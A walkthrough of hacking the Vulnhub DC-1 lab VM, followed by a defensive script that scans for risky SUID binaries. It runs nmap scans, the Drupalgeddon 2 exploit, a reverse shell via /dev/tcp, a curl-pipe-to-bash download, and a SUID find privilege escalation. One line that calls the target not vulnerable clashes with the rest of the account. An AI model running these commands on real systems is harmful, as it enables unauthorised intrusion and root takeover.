It’s been a while since I wrote; creating this series of me hacking through the DC VMs from Vulnhub should be the perfect opportunity.
I’ll skip the IP discovery part; if you’ve read previous articles it should be pretty straightforward.
First, run a fast scan on all ports to discover which ones are open.
nmap -sS -p- --min-rate=1000 192.168.56.104
Now we can deep dive and use nmap scripts to get the versions and some more information on the services running.
nmap -sC -sV -p 22,80,111,52587 -oN DC:1.tcpscan 192.168.56.104
Based on the nmap output, Drupal 7 is running on Apache, and we can verify that by checking in the browser.
You can also use the Wappalyzer plugin to get the version of Drupal that is running.
If you’ve come across Drupal before you might have heard of Drupalgeddon.
Fortunately, Drupal 7 is exploitable by Drupalgeddon 2, which exploits the RCE vulnerability. Here’s a good repo that has the PoC to verify this.
Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002) - dreadlocked/Drupalgeddon2
This didn’t happen to be vulnerable.
Running the PoC proves the vulnerability and gives the ability for remote code execution.
Getting shell and privilege escalation
The exploit runs as a web shell, which is not ideal, so it’s better to get a reverse shell that runs bash.
I hosted a shell script on my Kali with this command:
bash -i >& /dev/tcp/192.168.56.1/9001 0>&1
Then ran on the prompt given by the exploit:
curl http://192.168.56.1/shell.sh | bash
This way I got a reverse shell on nc listening on 9001.
What I like to do after I get a shell is run LinEnum to find possible ways to privesc.
Looking through the output, find has its SUID bit set.
We can abuse that to get root privileges!
find . -exec /bin/sh \; -quit
Using this find command from GTFOBins we get root and read the final flag.
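From the defender's side, the same misconfiguration can be caught before anyone abuses it. The script below is an added example, not part of the original walkthrough: it walks a filesystem and flags root-owned SUID binaries such as find. The names RISKY_NAMES, SKIP_DIRS, classify and scan are made up for this example, and the name list is a small constructed sample.

```python
import os
import stat
import sys

# Constructed, partial sample of binaries that can run arbitrary commands;
# for a real audit, extend it from the SUID category on GTFOBins.
RISKY_NAMES = {"find", "vim", "nmap", "bash", "sh", "env", "awk", "perl", "python"}
# Pseudo-filesystems that never hold real SUID binaries.
SKIP_DIRS = {"/proc", "/sys", "/dev"}


def classify(path, mode, uid):
    """Return None if not a SUID regular file, else 'high' or 'review'."""
    if not stat.S_ISREG(mode) or not mode & stat.S_ISUID:
        return None
    # Root-owned SUID plus a command-execution feature is a direct path to root.
    if uid == 0 and os.path.basename(path) in RISKY_NAMES:
        return "high"
    return "review"


def scan(root="/"):
    """Walk root and return sorted (level, path) pairs for SUID files."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # file vanished or is unreadable
            level = classify(path, st.st_mode, st.st_uid)
            if level:
                findings.append((level, path))
    return sorted(findings)


if __name__ == "__main__":
    for level, path in scan(sys.argv[1] if len(sys.argv) > 1 else "/"):
        print(f"{level:6} {path}")
```

Anything reported as high should have the bit cleared with chmod u-s unless there is a documented reason for it.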
For this VM my goal was just getting root; for future VMs I’ll try to work on some post exploitation and explore more ways to exploit and privesc. This VM is for beginners and exploiting it is straightforward.